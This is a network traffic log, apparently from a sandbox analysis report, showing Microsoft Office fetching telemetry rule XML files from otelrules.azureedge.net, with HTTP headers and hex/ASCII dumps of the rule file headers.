                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        131192.168.2.64985613.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:20 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:20 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:20 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1397
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                        ETag: "0x8DC582BDFD43C07"
                                                        x-ms-request-id: ad01162d-901e-0064-5fc3-2ce8a6000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152720Z-16547b76f7fr28cchC1DFWnuws0000000fxg00000000bz3t
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:20 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        132192.168.2.64986013.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:20 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:20 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:20 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1401
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                        ETag: "0x8DC582BE2A9D541"
                                                        x-ms-request-id: ec000542-b01e-005c-62a0-344c66000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152720Z-15869dbbcc6pfq2ghC1DFWh2wg00000001d000000000q6v2
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:20 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        133192.168.2.64986113.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:20 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:21 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:20 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1364
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                        ETag: "0x8DC582BEB6AD293"
                                                        x-ms-request-id: 3018dbe1-101e-008d-70d2-2c92e5000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152720Z-16547b76f7fm7xw6hC1DFW5px40000000fng00000000m7de
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:21 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        134192.168.2.64986313.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:20 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:21 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:20 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1354
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                        ETag: "0x8DC582BE0662D7C"
                                                        x-ms-request-id: 1deec605-401e-0029-2fd2-2c9b43000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152720Z-16547b76f7fm7xw6hC1DFW5px40000000ft0000000007k3u
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:21 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        135192.168.2.64986213.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:21 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:21 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:21 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1391
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                        ETag: "0x8DC582BDF58DC7E"
                                                        x-ms-request-id: 42bc0e5a-201e-0033-26a6-34b167000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152721Z-17df447cdb5lrwcchC1DFWphes0000000c4g00000000bgdh
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:21 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        136192.168.2.64986413.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:21 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:21 UTC517INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:21 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1403
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                        ETag: "0x8DC582BDCDD6400"
                                                        x-ms-request-id: 4df37937-b01e-003d-35ab-2bd32c000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152721Z-16547b76f7f2g4rlhC1DFWnx880000000frg00000000cx1q
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:21 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        137192.168.2.64986513.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:21 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:21 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:21 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1366
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                        ETag: "0x8DC582BDF1E2608"
                                                        x-ms-request-id: 510f214b-601e-0050-22a5-342c9c000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152721Z-15869dbbcc6bmgjfhC1DFWzfzs00000007e0000000001dmw
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:21 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        138192.168.2.64986613.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:21 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:21 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:21 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1399
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                        ETag: "0x8DC582BE8C605FF"
                                                        x-ms-request-id: 5b14ddc3-301e-0033-2bd2-2cfa9c000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152721Z-16547b76f7fq9mcrhC1DFWq15w0000000fpg00000000nmsd
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:21 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        139192.168.2.64986713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:21 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:21 UTC517INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:21 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1362
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                        ETag: "0x8DC582BDF497570"
                                                        x-ms-request-id: 9890a075-d01e-002b-06d2-2c25fb000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152721Z-16547b76f7fnlcwwhC1DFWz6gw0000000g0g000000001z94
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:21 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        140192.168.2.64986813.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:21 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:22 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:22 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1403
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                        ETag: "0x8DC582BDC2EEE03"
                                                        x-ms-request-id: e1b64052-701e-003e-45a3-3479b3000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152722Z-17df447cdb5w28bthC1DFWgb640000000bvg000000009e4g
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:22 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        141192.168.2.64986913.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:22 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:22 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:22 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1366
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                        ETag: "0x8DC582BEA414B16"
                                                        x-ms-request-id: 50ec610d-601e-0070-10a1-34a0c9000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152722Z-15869dbbcc6pfq2ghC1DFWh2wg00000001fg00000000fxdp
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
